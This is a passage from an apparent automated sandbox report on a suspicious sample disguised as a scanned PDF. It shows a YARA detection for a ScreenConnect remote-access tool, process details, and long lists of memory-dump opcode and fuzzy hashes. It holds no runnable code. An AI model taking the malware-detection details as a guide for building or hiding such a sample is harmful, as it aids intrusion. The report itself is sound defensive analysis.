                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1452815491.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:00:12:41
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                          Imagebase:0x7ff77afe0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Reset < >
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: ad05c0a554e796cd9a7142f15c6ff892974b2bd3dd9a79f5f6b5174df329140c
                                                                                            • Instruction ID: e622ca98c70a9b7935f102ade6eb2f93f21297ded94b0b52e730521ddfffbfd1
                                                                                            • Opcode Fuzzy Hash: ad05c0a554e796cd9a7142f15c6ff892974b2bd3dd9a79f5f6b5174df329140c
                                                                                            • Instruction Fuzzy Hash: E7625934A00218CFDB15DF65D844BADBBB6FF89310F1481A9E909AB350DB75AD86CF90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: e3f37b1f5b87714b614cc7fc931995e4d3d41a47f97f8dc4edc0daae57440887
                                                                                            • Instruction ID: 205c50c15d3d80e77523a123d9b59407dab70b830459ea8d4540acd574eae60b
                                                                                            • Opcode Fuzzy Hash: e3f37b1f5b87714b614cc7fc931995e4d3d41a47f97f8dc4edc0daae57440887
                                                                                            • Instruction Fuzzy Hash: F8423738A00218CFDB15DF64D844BADBBB6FF89350F148199E909AB350DB75AD82CF84
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9168f0138719010d09e3fce99387710eb8e7b390beeadf826305164fbb15d02d
                                                                                            • Instruction ID: 6d5264fe2b76037de512d1c1c9f7bb73be76427a1f972198ee295ebb4ce4aaef
                                                                                            • Opcode Fuzzy Hash: 9168f0138719010d09e3fce99387710eb8e7b390beeadf826305164fbb15d02d
                                                                                            • Instruction Fuzzy Hash: 70C21935B002059FDB14DFA9C984EADBBB2FF88310F158169E959AB3A5DB70AC41CF50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c04bd3da4666135d74a7836a72edc49faf1cc00544a3885a7adf9452ac0b0cd9
                                                                                            • Instruction ID: 00dbd054ce8f2c4827b7100722aa06a97ed658d5170e03ed51c07ce486d747d2
                                                                                            • Opcode Fuzzy Hash: c04bd3da4666135d74a7836a72edc49faf1cc00544a3885a7adf9452ac0b0cd9
                                                                                            • Instruction Fuzzy Hash: 3162B474B006159FCB14EF69C890AAEBBF2FF84320B548569E556DB791DB30EC42CB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1345669958.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1530000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C8${/
                                                                                            • API String ID: 0-4231431693
                                                                                            • Opcode ID: 568e3b730b20bca7d23bde8557b9db7ab7c25f7d679821f5a0fdda9f4c1aa019
                                                                                            • Instruction ID: 92bf3c9465d92fd06d230e69e9b12e22632ce675ed53371138ab22320764c2e8
                                                                                            • Opcode Fuzzy Hash: 568e3b730b20bca7d23bde8557b9db7ab7c25f7d679821f5a0fdda9f4c1aa019
                                                                                            • Instruction Fuzzy Hash: 5E518F75710202AFCB019B6DE481EAE77D6FBC96713948628E4168F780EF74EC42CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: kom^
                                                                                            • API String ID: 0-4083855230
                                                                                            • Opcode ID: f5083d83a4cace74d2d7a789475c86eb1a60aa75d0e39b8867ff45eaa3a2f9d5
                                                                                            • Instruction ID: c4cbb412395f122930568364f220a663ebc473a02ecc557125523c2b2de72596
                                                                                            • Opcode Fuzzy Hash: f5083d83a4cace74d2d7a789475c86eb1a60aa75d0e39b8867ff45eaa3a2f9d5
                                                                                            • Instruction Fuzzy Hash: 58513C78B007099FDB14DF69C894EAAB7F2FF8C210B148569E516DB365EB70EC018B90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: kom^
                                                                                            • API String ID: 0-4083855230
                                                                                            • Opcode ID: 863cfdc3e91d437905be5c818f15dfade2ba148e9ed0da46ed559a9a20408a98
                                                                                            • Instruction ID: 3f42182281b9374f6ed5d118070353457d0fc23be576b4b4e7936b1d1d82aaf9
                                                                                            • Opcode Fuzzy Hash: 863cfdc3e91d437905be5c818f15dfade2ba148e9ed0da46ed559a9a20408a98
                                                                                            • Instruction Fuzzy Hash: 08510B78B007099FDB14DF69C894EAAB7F6FF8C2107148569E516DB365EB70EC018B90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: s+
                                                                                            • API String ID: 0-1285507049
                                                                                            • Opcode ID: d9c1fadc18c9fbc9553d4c37d048c40d25c943d33e5ac10bb4a0c9569e10fdd6
                                                                                            • Instruction ID: d6cb21587b33f36ec2f6e5b1688baaa849118fdd94f3f6973d0f55b8632cb421
                                                                                            • Opcode Fuzzy Hash: d9c1fadc18c9fbc9553d4c37d048c40d25c943d33e5ac10bb4a0c9569e10fdd6
                                                                                            • Instruction Fuzzy Hash: FA41C631A102199FDB05DF64D490AEEBBF2FF85310F548169E905AB240EF70AD05CBE0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: s+
                                                                                            • API String ID: 0-1285507049
                                                                                            • Opcode ID: 6890bb3bd9d9fd96b6f2756365536c495b5daa7aec5881ae3e14410c4f6aabfd
                                                                                            • Instruction ID: 219185be87fd5e6c71abac9f22c3ea0428c5945d35ba1fd855d582779fb16fed
                                                                                            • Opcode Fuzzy Hash: 6890bb3bd9d9fd96b6f2756365536c495b5daa7aec5881ae3e14410c4f6aabfd
                                                                                            • Instruction Fuzzy Hash: F541C331A102199FDB05DF64C890AAEBFF6EF85314F548559E905AB340EB70AD06CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: vBq
                                                                                            • API String ID: 0-2029862218
                                                                                            • Opcode ID: 9dcb443d0d2cb0a8311b9c7ba9678b30fd78b6169020017a27ad3729a07f408a
                                                                                            • Instruction ID: cc042005852a4c3c57dd166ee40422f7670a96fb5703454647429941df11634a
                                                                                            • Opcode Fuzzy Hash: 9dcb443d0d2cb0a8311b9c7ba9678b30fd78b6169020017a27ad3729a07f408a
                                                                                            • Instruction Fuzzy Hash: 23318630B00218AFEB18EBA9D894BBDB6B6FF88700F208429E512B77D4DF715C058B54
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1345669958.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1530000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: K]
                                                                                            • API String ID: 0-3798347547
                                                                                            • Opcode ID: 2d0dc549bd4f9d98064fcf6daa08d71e7f8f4cbe4abfac47afa75625fdf4ecfe
                                                                                            • Instruction ID: 91c28bc593e7b7534dfc1e4a6230319175455177afdd226e6a783d1751333951
                                                                                            • Opcode Fuzzy Hash: 2d0dc549bd4f9d98064fcf6daa08d71e7f8f4cbe4abfac47afa75625fdf4ecfe
                                                                                            • Instruction Fuzzy Hash: FD31C6366043409FDB05DF68D89178EBBB1EF86264F55846AE809DF352EA34EC0987A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365490827.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5aa0000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: S/om^
                                                                                            • API String ID: 0-3612489777
                                                                                            • Opcode ID: 7d1b3ba42c4e3ac423c5c6281f8bcf4de0f5db13f054060a4da641dcacab2b02
                                                                                            • Instruction ID: 0a4d1c5d859a3a4ba584cfef48d5b02cc73ca4f0a858b9428966f85c555e3a5a
                                                                                            • Opcode Fuzzy Hash: 7d1b3ba42c4e3ac423c5c6281f8bcf4de0f5db13f054060a4da641dcacab2b02
                                                                                            • Instruction Fuzzy Hash: 2C21F3B161030AAFD701DBA5E891BAE7BA5FF96260B448529E519CF340EF30EC018B95
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365490827.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5aa0000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: S/om^
                                                                                            • API String ID: 0-3612489777
                                                                                            • Opcode ID: 1e370b41c87f734a68f9b1636c9773dbfa83e710a17f02b71c7dd80372fa949e
                                                                                            • Instruction ID: 49f5833fee3a371b15796d8a298ee0de282502fc23927faa841a21e6c9666b62
                                                                                            • Opcode Fuzzy Hash: 1e370b41c87f734a68f9b1636c9773dbfa83e710a17f02b71c7dd80372fa949e
                                                                                            • Instruction Fuzzy Hash: 2511917131030AABDB00EB66E8C19AEB7E6FFD56707408529E5198B340EF71AD058BD5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be5f91a6fc5dd7b593b09f87053b873943b24e5a5069e8880f7305d4027ce07f
                                                                                            • Instruction ID: a4051f9663f51751d16d2f0a141849baee72cc5046e4efe4b2a43efe6c81d7bd
                                                                                            • Opcode Fuzzy Hash: be5f91a6fc5dd7b593b09f87053b873943b24e5a5069e8880f7305d4027ce07f
                                                                                            • Instruction Fuzzy Hash: 25F1F070B007158FD714DB69C890BAABBE2BF85310F1584A9D59A9F791DB30EC05CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365490827.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5aa0000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 06af6e69d3c247e1af05f1932033036b8747b2e8e0f7c46a0737c27354fd4466
                                                                                            • Instruction ID: 9107ccb5fc6edaf75f8e51b9ffdb520eaa1530bb889116f490e2eda6957f7009
                                                                                            • Opcode Fuzzy Hash: 06af6e69d3c247e1af05f1932033036b8747b2e8e0f7c46a0737c27354fd4466
                                                                                            • Instruction Fuzzy Hash: DBE19131B002049BDB28EB64D498AAEB7F7EF88310F148469E516DB394DF719C42CB95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365490827.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5aa0000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8fb774bdce8ff38076d4a3b887bf4fbe04e65126d01171c72942d0a7e7eabd88
                                                                                            • Instruction ID: 731fc2ab47040cc521772e7c4acaa3af1fc3565bb97222cf624dc797d6a2c3fb
                                                                                            • Opcode Fuzzy Hash: 8fb774bdce8ff38076d4a3b887bf4fbe04e65126d01171c72942d0a7e7eabd88
                                                                                            • Instruction Fuzzy Hash: 6E028C35A00205DFCB14DF68D884EAAB7F2FF88310B558569E946AB365EB30EC45CF94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e8b930ffbef9069baa80f6a1d7e51e16d1be997c770912bb29b7aaec42632dc6
                                                                                            • Instruction ID: e8d31195040a37526471fa948d8d3059ea09e2f659c3f6a4d239fb4b11f2a35a
                                                                                            • Opcode Fuzzy Hash: e8b930ffbef9069baa80f6a1d7e51e16d1be997c770912bb29b7aaec42632dc6
                                                                                            • Instruction Fuzzy Hash: 0FD18C74B003059FCB24EB69C490A7EBBB2BF88300F558569E456DB385DB35EC42CBA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365490827.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5aa0000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 92c8d408055877290b7468436ad0e053a0568b83e079676e7b70f2835bbb35af
                                                                                            • Instruction ID: b950d8c8500aea092149a9d8325b1f0ef936328840fa81ffb206a6ee22a68dde
                                                                                            • Opcode Fuzzy Hash: 92c8d408055877290b7468436ad0e053a0568b83e079676e7b70f2835bbb35af
                                                                                            • Instruction Fuzzy Hash: 97C16E72F002199FDB04DFA9C584AAEBBF6FF88350F158069D915AB250DB34EC41CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1345669958.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1530000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ee86aa8e8b4b586cf633121916f8231c88f98e37c79561d4b93eb817975b5724
                                                                                            • Instruction ID: d955d271b4315d54c0720def6e6e7de6f939eff8f67ee6e4b05bf2c7ff04fb97
                                                                                            • Opcode Fuzzy Hash: ee86aa8e8b4b586cf633121916f8231c88f98e37c79561d4b93eb817975b5724
                                                                                            • Instruction Fuzzy Hash: B5C1F735A0020ADFCF05CFA8C9809AEBBB6FF89314B648459E955AB351D731ED16CF90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2aceb15c91740bb36db990355c76d193d38225dcab77ad8c9abbbddfad301580
                                                                                            • Instruction ID: a8001eacb127218c091aed7111a00b40b2704e109a5e89ec47507a901e0ec8e8
                                                                                            • Opcode Fuzzy Hash: 2aceb15c91740bb36db990355c76d193d38225dcab77ad8c9abbbddfad301580
                                                                                            • Instruction Fuzzy Hash: 5CC1D278B002059FD714EF69C894EAAB7F2FF88310F558099E915AB3A5DB35EC41CB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365490827.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5aa0000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ec2eb3e3997206851cf8d7b663c327b7c4f997eaaf8166a0f04622ea56c88af
                                                                                            • Instruction ID: c00bf32c9ff47178e4fc79ac760a9911771e69d9938e091c4176a1f6cac25988
                                                                                            • Opcode Fuzzy Hash: 7ec2eb3e3997206851cf8d7b663c327b7c4f997eaaf8166a0f04622ea56c88af
                                                                                            • Instruction Fuzzy Hash: 36D16875A00605CFCB05DF58C884EA9B7F2FF88310B568569E846AB365EB30FC81CB94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365490827.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5aa0000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 825b05fa4e5b90870416eb647cbd619b91a5971b454107f255b1734e04a02b61
                                                                                            • Instruction ID: ebc4bb5a65453b07b5760f602642d16d18dfb580ddc8520a468296eb646e8661
                                                                                            • Opcode Fuzzy Hash: 825b05fa4e5b90870416eb647cbd619b91a5971b454107f255b1734e04a02b61
                                                                                            • Instruction Fuzzy Hash: 52C15B35600616CFCB14DF59C584DBAB7F2FF84304B968899E4469B2A6DB31FC46CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fc44e730baeb835a7bbb5c489618b1ddb76cf71da7eeb89bcfd77dbef4e74bfe
                                                                                            • Instruction ID: 13617bc0f877b43a2da4af9e0081cfb09afaf92598c0f5efda229ef5a6d1a6e2
                                                                                            • Opcode Fuzzy Hash: fc44e730baeb835a7bbb5c489618b1ddb76cf71da7eeb89bcfd77dbef4e74bfe
                                                                                            • Instruction Fuzzy Hash: 76B1AA75A006159FD724DF68C880A7AFBF2FF88320B58896AE456DB651D731FC41CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e2bf8344705f6737a888acd4f332ad35021c556ddf754f0fc0c4e143dd2be0bb
                                                                                            • Instruction ID: da81404a43714d4264afdd2f47c2a701866602381b1d7fc9f56c38ce09727ee3
                                                                                            • Opcode Fuzzy Hash: e2bf8344705f6737a888acd4f332ad35021c556ddf754f0fc0c4e143dd2be0bb
                                                                                            • Instruction Fuzzy Hash: 9BA11874B002198FDB14EBA8D594EAEB7F2BF88310B544599E416EB364DB35EC02CF90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365490827.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5aa0000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9ccc8feb1b9af486520b575194243a1fcc8e9547c699cf3d2ca0ae8e9dcc3c57
                                                                                            • Instruction ID: db589fe16d9a24f991baa6e1b6df1f622bbfe986810b9e99d33101888df477b5
                                                                                            • Opcode Fuzzy Hash: 9ccc8feb1b9af486520b575194243a1fcc8e9547c699cf3d2ca0ae8e9dcc3c57
                                                                                            • Instruction Fuzzy Hash: C2B12835600616CFCB14DF48C584DB9B7F2FF84304B968899E446AB266DB30FD46CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 103f51919063662d79d210a6d09ddb1525cbd987ae2d87b01fbd79e583b0aff6
                                                                                            • Instruction ID: 32325cf7f4bb31e83b476d0f7e63c39c7a2e2bd5b1842d0961917203f3e29fa9
                                                                                            • Opcode Fuzzy Hash: 103f51919063662d79d210a6d09ddb1525cbd987ae2d87b01fbd79e583b0aff6
                                                                                            • Instruction Fuzzy Hash: 97910774B002198FDB14EBA8C594EAEB7F2BF89310B5445A9E416EB764DB35EC02CF50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a935955e66efcb7174a5e98dc48b5251c63c413a7b2801eb162e04e9ec952acd
                                                                                            • Instruction ID: ecf611817e73c48c9f1c388c27882d21412d5e930e580935ac2085544c94efc3
                                                                                            • Opcode Fuzzy Hash: a935955e66efcb7174a5e98dc48b5251c63c413a7b2801eb162e04e9ec952acd
                                                                                            • Instruction Fuzzy Hash: 72818D75B102058FC704DB68D884E7EBBB2FF89310B5585A9E8599B391DB31EC41CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: df0bc7ae5bb656bf22547440217b0a9990ae012bc87d431ceb5d788c1eec549b
                                                                                            • Instruction ID: e7aebb0cb1c862030f5ad277fc8dd2d0843e7f6e389c24a66827801d05c7f3ca
                                                                                            • Opcode Fuzzy Hash: df0bc7ae5bb656bf22547440217b0a9990ae012bc87d431ceb5d788c1eec549b
                                                                                            • Instruction Fuzzy Hash: E7815974B002059FDB04EFA8C994EAEBBF6EF89710F558159E515AB3A1DB30AC01CB61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1345669958.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1530000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e98283e6ecd63599244baca9bc3bbfa4d5f61bb311fab4bb9019ddd17d70c1e3
                                                                                            • Instruction ID: b9f7d355a1a32d82ce390523838b28091490ba08d8847dc0f7178f6f57302f40
                                                                                            • Opcode Fuzzy Hash: e98283e6ecd63599244baca9bc3bbfa4d5f61bb311fab4bb9019ddd17d70c1e3
                                                                                            • Instruction Fuzzy Hash: EC813534B002099FCB05DBA9D594A6DBBF2FFC8710B148529E81ADB395EB74EC46CB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1345669958.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1530000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3782fb7529444741f81cadd9879a9e1155e27fcce02ad9e18e6450178ad36819
                                                                                            • Instruction ID: 5151a6c8d382af1ae9789d82b4e0b356b0d07f7d37944419772bd8d62169d334
                                                                                            • Opcode Fuzzy Hash: 3782fb7529444741f81cadd9879a9e1155e27fcce02ad9e18e6450178ad36819
                                                                                            • Instruction Fuzzy Hash: AC913B75A003199BCB15DFA9D444A9EBBF2FF84720B148529E815AF345EB70ED06CF90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1345669958.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1530000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1d1f0ebe78ae77054d0bfa7b7202472473ae6e52c98334383136ec260c3bed10
                                                                                            • Instruction ID: 9e90febed80a7df8b81eb698f49807e88b4dff8aded22959bcf02089882bedb1
                                                                                            • Opcode Fuzzy Hash: 1d1f0ebe78ae77054d0bfa7b7202472473ae6e52c98334383136ec260c3bed10
                                                                                            • Instruction Fuzzy Hash: BF91AD34A006058FDB41DF28C88899DBBF5FF8972075189AAE55ADB761DB31EC01CF92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1365392988.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a80000_Scan_PDF_2017163298.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 737c8dce1c5d81dfe6dfe868b6ff77f93cf914ad0be0d94ec7a06327d465306e
                                                                                            • Instruction ID: 1d1512f74a7710dfcee14c1dbd15d7f09d7b939c1a1c25857cc53f169180f1a5
